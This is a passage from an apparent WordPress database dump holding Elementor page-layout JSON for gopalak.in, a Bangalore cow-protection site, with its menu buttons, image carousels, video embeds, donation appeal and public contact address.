here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11535,1917,'_elementor_page_assets','a:0:{}'),(11537,1918,'_elementor_edit_mode','builder'),(11538,1918,'_elementor_template_type','wp-page'),(11539,1918,'_elementor_version','3.7.8'),(11540,1918,'_wp_page_template','elementor_canvas'),(11541,1918,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#D5EBC1\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 